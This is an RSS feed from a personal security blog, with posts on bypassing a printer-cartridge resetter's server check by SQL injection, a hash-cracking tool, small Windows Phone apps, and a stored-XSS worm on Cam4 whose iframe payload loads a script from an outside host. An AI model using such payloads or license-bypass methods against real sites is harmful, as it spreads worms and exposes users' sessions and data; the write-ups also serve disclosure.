<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>LOCU&#039;S STUFF</title>
	<atom:link href="http://xlocux.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://xlocux.wordpress.com</link>
	<description>It&#039;s easier than you believe but more difficulty than you think!</description>
	<lastBuildDate>Fri, 27 Jan 2012 03:38:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='xlocux.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://0.gravatar.com/blavatar/88591c391a44afded508b30b977ab2fd?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>LOCU&#039;S STUFF</title>
		<link>http://xlocux.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://xlocux.wordpress.com/osd.xml" title="LOCU&#039;S STUFF" />
	<atom:link rel='hub' href='http://xlocux.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Protected: Windows Phone 7: Remote Crash</title>
		<link>http://xlocux.wordpress.com/2012/01/27/windows-phone-7-remote-crash/</link>
		<comments>http://xlocux.wordpress.com/2012/01/27/windows-phone-7-remote-crash/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 03:17:44 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[(In)Security]]></category>
		<category><![CDATA[Advisory]]></category>
		<category><![CDATA[Windows Phone 7]]></category>
		<category><![CDATA[Remote Crash]]></category>
		<category><![CDATA[vunerability]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=689</guid>
		<description><![CDATA[There is no excerpt because this is a protected post.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=689&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This post is password protected. You must visit the website and enter the password to continue reading.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/689/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=689&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2012/01/27/windows-phone-7-remote-crash/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>
	</item>
		<item>
		<title>When Reversing meet SQL Injection</title>
		<link>http://xlocux.wordpress.com/2011/12/15/when-reversing-meet-hacking/</link>
		<comments>http://xlocux.wordpress.com/2011/12/15/when-reversing-meet-hacking/#comments</comments>
		<pubDate>Thu, 15 Dec 2011 09:58:32 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[(In)Security]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[epson]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[reverse engineering]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=652</guid>
		<description><![CDATA[It&#8217;s been a while since i wrote my last thread, life goes fast and the time is always less than before. Anyway lately i found an interesting target that push me up to write few lines about this case.  Someone i knew in a forum has posted a thread regarding a software (an Epson  print [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=652&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been a while since i wrote my last thread, life goes fast and the time is always less than before. Anyway lately i found an interesting target that push me up to write few lines about this case.  Someone i knew in a forum has posted a thread regarding a software (an Epson  print cartridges resetter) that use a server validation to work, nothing special but i had some free time and i start working on it.</p>
<p><span id="more-652"></span></p>
<p>From a cracker point of view i begin to debug the program looking inside the registration routine to check how the validation works, and if was possible to bypass it.</p>
<p>When i patched the server-check the app seems run fine but i did not have an Epson&#8217;s Printer to test it so i thought to take another approach to the problem and collect more infos,  like <strong>connection type</strong>, <strong>protocol</strong>, <strong>server address </strong>and so on, in order to obtain the same result without patching the target. I sniffed few packets during the Server/Client communication and in fact was possible to emulate the server reply so i coded a simple tcp server to accomplish the work but during my testing i see some sql error from the server so i though to try some SQL Injection jutzu and in less then a minute a got it!</p>
<p><a href="http://xlocux.files.wordpress.com/2011/12/123453.png"><img class="aligncenter size-full wp-image-668" title="123453" src="http://xlocux.files.wordpress.com/2011/12/123453.png?w=450&#038;h=359" alt="" width="450" height="359" /></a></p>
<p><img class="aligncenter size-full wp-image-669" title="fgsetserger" src="http://xlocux.files.wordpress.com/2011/12/fgsetserger.png?w=450&#038;h=359" alt="" width="450" height="359" /></p>
<p>The coder of this prog has made 2 fatal errors forgetting to sanityze the input parameter in the SQL statement and also in the client application.</p>
<p>The next time you found a similar server check, rather than start from the reversing would be better to try some SQLi first!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/652/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/652/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/652/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=652&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/12/15/when-reversing-meet-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/12/123453.png" medium="image">
			<media:title type="html">123453</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/12/fgsetserger.png" medium="image">
			<media:title type="html">fgsetserger</media:title>
		</media:content>
	</item>
		<item>
		<title>Hash Crack</title>
		<link>http://xlocux.wordpress.com/2011/08/15/ntlmmd5sha1-hash-crack/</link>
		<comments>http://xlocux.wordpress.com/2011/08/15/ntlmmd5sha1-hash-crack/#comments</comments>
		<pubDate>Mon, 15 Aug 2011 20:24:14 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[Tools & Fix]]></category>
		<category><![CDATA[.NET]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[HCrack]]></category>
		<category><![CDATA[LM]]></category>
		<category><![CDATA[MD4]]></category>
		<category><![CDATA[MD5]]></category>
		<category><![CDATA[MySQL5]]></category>
		<category><![CDATA[NTLM]]></category>
		<category><![CDATA[SHA1]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=630</guid>
		<description><![CDATA[I wrote a tool that use md5decrypter API to decrypt MD4,MD5,NTLM,LM,SHA1,MySQL5 password. A big thanks to md5decrypter.co.uk for the great hashes database, over 8.7 billion unique decrypted passwords, their work is very precious. File Url: HCrack Rar Password: locu MD5 Checksum: 1bf409e8ec95f0627c817b1d71948cae SHA1 Checksum: 801454b584a73fb9480de64be0448f68f47b76a5<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=630&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I wrote a tool that use <a href="http://www.md5decrypter.co.uk/">md5decrypter</a> API to decrypt MD4,MD5,NTLM,LM,SHA1,MySQL5 password.</p>
<p><a href="http://xlocux.files.wordpress.com/2011/08/hcrack.png"><span id="more-630"></span></a></p>
<p><a href="http://xlocux.files.wordpress.com/2011/08/hcrack11.png"><img class="aligncenter size-full wp-image-682" title="hcrack1" src="http://xlocux.files.wordpress.com/2011/08/hcrack11.png?w=450&#038;h=245" alt="" width="450" height="245" /></a></p>
<p>A big thanks to md5decrypter.co.uk for the great hashes database, over <strong>8.7 billion</strong> unique decrypted passwords, their work is very precious.</p>
<p>File Url: <a title="Hash Crack 1.12.11" href="http://www.multiupload.com/94P79XOOML" target="_blank">HCrack</a></p>
<p>Rar Password: <strong>locu</strong></p>
<p>MD5 Checksum: <strong>1bf409e8ec95f0627c817b1d71948cae</strong></p>
<p>SHA1 Checksum: <strong>801454b584a73fb9480de64be0448f68f47b76a5</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/630/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/630/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/630/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=630&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/08/15/ntlmmd5sha1-hash-crack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/08/hcrack11.png" medium="image">
			<media:title type="html">hcrack1</media:title>
		</media:content>
	</item>
		<item>
		<title>Cam4: Persistent XSS Aka Worm</title>
		<link>http://xlocux.wordpress.com/2011/06/27/cam4-stored-xss-aka-worm/</link>
		<comments>http://xlocux.wordpress.com/2011/06/27/cam4-stored-xss-aka-worm/#comments</comments>
		<pubDate>Mon, 27 Jun 2011 02:59:14 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[(In)Security]]></category>
		<category><![CDATA[Advisory]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[stored xss]]></category>
		<category><![CDATA[xss worm]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=595</guid>
		<description><![CDATA[A friend of mine has told me about this website so I take a look at it and i was impressed to see thousands of free live webcam with any sorts of sex perversions (sounds like a piece of paradise or hell depends from the points of view). Therefore i start thinking about security and, after [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=595&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>A friend of mine has told me about this website so I take a look at it and i was impressed to see thousands of free live webcam with any sorts of sex perversions (sounds like a piece of paradise or hell depends from the points of view). Therefore i start thinking about security and, after 10 minutes, i found a critical flaw in the user profile.</p>
<p><span id="more-595"></span></p>
<p><img class="aligncenter" src="http://farm3.static.flickr.com/2381/2235913494_4ef7bbca00_o.gif" alt="" width="300" height="300" /></p>
<p>In fact every user has a profile questionary that will be showed always below the webcam also during the show. The questionary inputs are NOT well filtered so i thought to use a xss as vector for the worm.</p>
<p><strong>&lt;iframe SRC=&#8217;http://funserver.com/worm.js&#8217;&lt;</strong></p>
<p style="text-align:center;">|</p>
<p><em>Worm.js Source:</em></p>
<p style="text-align:center;"><a href="http://xlocux.files.wordpress.com/2011/06/wrm.png"><img class="aligncenter" title="wrm" src="http://xlocux.files.wordpress.com/2011/06/wrm.png?w=300&#038;h=148" alt="" width="300" height="148" /></a></p>
<p style="text-align:center;">|</p>
<p>This basic worm just rewrite the victim questionary to propagate itself. As you can see, in the highlighted line, i&#8217;ve put and image with the <em>onmouseover</em> function in order to emulate the submit button, so when the victim move the mouse pointer over the pic the game is done and the user is infected.</p>
<p style="text-align:center;">|</p>
<p style="text-align:center;"><a href="http://xlocux.files.wordpress.com/2011/06/atta.png"><img class="aligncenter" title="atta" src="http://xlocux.files.wordpress.com/2011/06/atta.png?w=300&#038;h=213" alt="" width="300" height="213" /></a></p>
<p style="text-align:center;">|</p>
<p>These threats have a massive propagation because the infection is exponential. Usually a camshow is approximately viewed by 1000 users or so and, as the <a href="http://en.wikipedia.org/wiki/Law_of_large_numbers" target="_blank">Law of large numbers</a> teaches us, someone will pass their mouse on the &#8220;viral&#8221; image and will be infected and the story begins again but now we&#8217;ve more than one user infected that could spread the worm, in this way all the catchment area will be saturated in a few days as we already saw with twitter, myspace etc.</p>
<p>As i said before my worm is very basic just few lines of html and javascript to show the flaw but an attacker could use different way to improve the worm and maximize the results,  also the intent could change to steal session,data, tokens etc. <strong>I tried many times to contact the technical support to fix the problem but they didn&#8217;t reply to my advice so i leave this post as an alert for all the cam4 users.</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/595/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/595/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/595/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=595&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/06/27/cam4-stored-xss-aka-worm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://farm3.static.flickr.com/2381/2235913494_4ef7bbca00_o.gif" medium="image" />

		<media:content url="http://xlocux.files.wordpress.com/2011/06/wrm.png?w=300" medium="image">
			<media:title type="html">wrm</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/06/atta.png?w=300" medium="image">
			<media:title type="html">atta</media:title>
		</media:content>
	</item>
		<item>
		<title>MD5/SHA1 Checksum Calculator</title>
		<link>http://xlocux.wordpress.com/2011/05/23/md5sha1-checksum-calculator/</link>
		<comments>http://xlocux.wordpress.com/2011/05/23/md5sha1-checksum-calculator/#comments</comments>
		<pubDate>Mon, 23 May 2011 20:32:27 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[Tools & Fix]]></category>
		<category><![CDATA[.NET]]></category>
		<category><![CDATA[MD5 checksum]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sha1 checksum]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=566</guid>
		<description><![CDATA[Simple tool to calculate files checksum that  support MD5 and SHA1. File Url: MD5-SHA1Checksum Passwords: locu MD5 Checksum: 1a9bbf0cd532b43771a97c59f123ae9b Donate BitCoin Hash: 1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=566&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Simple tool to calculate files checksum that  support <a href="http://en.wikipedia.org/wiki/MD5" target="_blank">MD5</a> and <a href="http://en.wikipedia.org/wiki/SHA-1" target="_blank">SHA1</a>.</p>
<p><a href="http://xlocux.files.wordpress.com/2011/05/mdsha1.png"><img class="aligncenter size-full wp-image-567" title="mdsha1" src="http://xlocux.files.wordpress.com/2011/05/mdsha1.png?w=450" alt=""   /><span id="more-566"></span></a></p>
<p><a href="http://xlocux.files.wordpress.com/2011/05/mdsha2.png"><img class="aligncenter size-full wp-image-568" title="mdsha2" src="http://xlocux.files.wordpress.com/2011/05/mdsha2.png?w=450" alt=""   /></a></p>
<p>File Url: <a href="http://www.multiupload.com/VCF2U99ZEJ" target="_blank">MD5-SHA1Checksum</a></p>
<p>Passwords: <strong>locu</strong></p>
<p>MD5 Checksum: <strong>1a9bbf0cd532b43771a97c59f123ae9b</strong></p>
<p><span style="color:#ff0000;"><strong>Donate</strong></span></p>
<p><span style="color:#008000;">BitCoin Hash: <strong>1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST</strong></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/566/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/566/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/566/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=566&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/05/23/md5sha1-checksum-calculator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/mdsha1.png" medium="image">
			<media:title type="html">mdsha1</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/mdsha2.png" medium="image">
			<media:title type="html">mdsha2</media:title>
		</media:content>
	</item>
		<item>
		<title>Windows Phone 7: MyPostePay</title>
		<link>http://xlocux.wordpress.com/2011/05/16/windows-phone-7-mypostepay/</link>
		<comments>http://xlocux.wordpress.com/2011/05/16/windows-phone-7-mypostepay/#comments</comments>
		<pubDate>Mon, 16 May 2011 17:41:23 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[Tools & Fix]]></category>
		<category><![CDATA[Windows Phone 7]]></category>
		<category><![CDATA[AES]]></category>
		<category><![CDATA[MyPostePay]]></category>
		<category><![CDATA[Samsung Omia 7]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=550</guid>
		<description><![CDATA[I don&#8217;t use the wallet so i built an app to store my postepay, for security reason i&#8217;ve not included the cvv and the card number is encrypted with AES. Login is required to decrypt and access data. App Url: MyPostePay Rar Password: locu MD5 Checksum: 52124075B84079F095E3C1272635A309 &#160; Donate BitCoin Hash: 1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=550&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t use the wallet so i built an app to store my postepay, for security reason i&#8217;ve not included the cvv and the card number is encrypted with AES. Login is required to decrypt and access data.</p>
<p><span id="more-550"></span></p>
<p><a href="http://xlocux.files.wordpress.com/2011/05/mypp.png"><img class="aligncenter size-full wp-image-551" title="mypp" src="http://xlocux.files.wordpress.com/2011/05/mypp.png?w=450&#038;h=308" alt="" width="450" height="308" /></a></p>
<p>App Url: <a href="http://www.multiupload.com/EZCI4RF1TN" target="_blank">MyPostePay</a></p>
<p>Rar Password: locu</p>
<p><strong>MD5 Checksum: 52124075B84079F095E3C1272635A309</strong></p>
<p>&nbsp;</p>
<p><span style="color:#ff0000;"><strong>Donate</strong></span></p>
<p><span style="color:#339966;">BitCoin Hash: <strong>1BUJBHNM8GwbD9cRwByZbSSdWf7Lrk3CST</strong></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xlocux.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xlocux.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xlocux.wordpress.com/550/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=550&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://xlocux.wordpress.com/2011/05/16/windows-phone-7-mypostepay/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/50d65ffd272656914e84984f7c843ae4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xlocux</media:title>
		</media:content>

		<media:content url="http://xlocux.files.wordpress.com/2011/05/mypp.png" medium="image">
			<media:title type="html">mypp</media:title>
		</media:content>
	</item>
		<item>
		<title>Windows Phone 7: SecMes</title>
		<link>http://xlocux.wordpress.com/2011/05/09/windows-phone-7-secmes/</link>
		<comments>http://xlocux.wordpress.com/2011/05/09/windows-phone-7-secmes/#comments</comments>
		<pubDate>Sun, 08 May 2011 23:12:28 +0000</pubDate>
		<dc:creator>xlocux</dc:creator>
				<category><![CDATA[Tools & Fix]]></category>
		<category><![CDATA[Windows Phone 7]]></category>
		<category><![CDATA[AES]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Samsung Omia 7]]></category>
		<category><![CDATA[SecMes]]></category>

		<guid isPermaLink="false">http://xlocux.wordpress.com/?p=510</guid>
		<description><![CDATA[Recently I bought a &#8220;Samsung Omnia 7&#8243;  and I have started some projects, just to get more feeling with the work enviroment, I found a very poor framework, many apis are not yet implemented and silverlight sucks, anyway I got a lot of fun during the developing so I thought to post one of them. Obviously to install [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xlocux.wordpress.com&amp;blog=13123236&amp;post=510&amp;subd=xlocux&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Recently I bought a &#8220;Samsung Omnia 7&#8243;  and I have started some projects, just to get more feeling with the work enviroment, I found a very poor framework, many apis are not yet implemented and silverlight sucks, anyway I got a lot of fun during the developing so I thought to post one of them.<img title="More..." src="http://xlocux.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" alt="" /> Obviously to install the tool you need an unlocked windows phone 7 smartphone and a deployer tool.</p>
